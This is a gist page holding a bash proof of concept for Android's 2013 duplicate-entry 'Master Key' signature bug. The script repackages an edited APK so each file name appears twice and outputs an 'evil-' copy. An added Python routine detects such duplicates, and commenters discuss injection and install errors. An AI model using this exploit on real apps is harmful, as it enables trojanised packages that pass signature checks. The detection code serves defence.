@poliva
Created July 8, 2013 10:35
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
# Unpacks the APK with apktool, lets you edit it, rebuilds it, then appends every
# file of the original APK to the rebuilt archive so each name appears twice.
if [ -z "$1" ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK="$1"
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d "$APK" out
#apktool d "$APK" out
echo "Modify files, when done type 'exit'"
cd out || exit 1
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/ || exit 1
unzip ../"$APK"
mv ../out.apk .
# helper: append a file to an existing zip; zipfile does not reject a name that is already present
cat >poc.py <<-'EOF'
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
find . -type f | egrep -v "(poc.py|out.apk)" | while read -r f ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-"$APK"
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
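Added defender-side example, not part of the gist: the condition the script above creates (one entry name listed twice in the ZIP central directory) is easy to check for before an archive is trusted. The Python below walks the central directory by hand, reports names that occur more than once, and shows that a stock parser silently settles on one copy; the sample archive is constructed in the code.

```python
import io
import struct
import warnings
import zipfile
from collections import Counter

EOCD_SIG = b"PK\x05\x06"  # end-of-central-directory record
CDIR_SIG = b"PK\x01\x02"  # central directory file header

def build_sample(entries):
    """Constructed sample archive from (name, bytes) pairs; repeating a name gives the PoC's duplicate-entry shape."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")  # zipfile warns on a duplicate name but still writes it
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
            for name, content in entries:
                z.writestr(name, content)
    return buf.getvalue()

def central_directory_names(data):
    """Walk the central directory by hand and return every entry name, duplicates included."""
    eocd = data.rfind(EOCD_SIG)  # assumes the archive comment does not itself contain the signature
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD: sig(4) disk(2) cd_disk(2) entries_on_disk(2) entries_total(2) cd_size(4) cd_offset(4) comment_len(2)
    _, _, _, _, total, _, cd_offset, _ = struct.unpack("<4sHHHHIIH", data[eocd:eocd + 22])
    names, pos = [], cd_offset
    for _ in range(total):
        if data[pos:pos + 4] != CDIR_SIG:
            raise ValueError("corrupt central directory header at offset %d" % pos)
        # 46-byte fixed header; name, extra and comment lengths sit at offsets 28, 30 and 32
        name_len, extra_len, comment_len = struct.unpack("<HHH", data[pos + 28:pos + 34])
        names.append(data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace"))
        pos += 46 + name_len + extra_len + comment_len
    return names

def duplicate_entries(data):
    """Entry names listed more than once; a non-empty result is reason to reject the archive outright."""
    counts = Counter(central_directory_names(data))
    return sorted(name for name, n in counts.items() if n > 1)

def copy_seen_by_zipfile(data, name):
    """Python's zipfile maps a name to the last central-directory entry, so it hands back the second copy."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.read(name)

if __name__ == "__main__":
    sample = build_sample([("classes.dex", b"first copy"), ("classes.dex", b"second copy")])
    print(duplicate_entries(sample), copy_seen_by_zipfile(sample, "classes.dex"))
```

Two parsers that disagree on which copy is "the" entry is exactly the gap the bug exploits, so a verifier that refuses any archive with a non-empty `duplicate_entries()` result removes the ambiguity instead of picking a side.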
@palani95

Found an open source scanner to detect this in Google Code,

http://code.google.com/p/bluebox-3xp10it-scanner/

@cvem

cvem commented Jul 21, 2013

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva
Author

poliva commented Jul 22, 2013

here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh

@cvem

cvem commented Jul 27, 2013

@poliva Thanks! :)

@esotericnomen

I tried with the script. And also, I've tried adding a duplicate classes.dex alone in the APK and trying to install on the device, but I am unable to install.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old Android versions. Any idea on what am I missing?

@huangtaowy

@esotericnomen have you solved the problem?

@xiaoxiong0930

I have also met this problem. Are there any solutions?
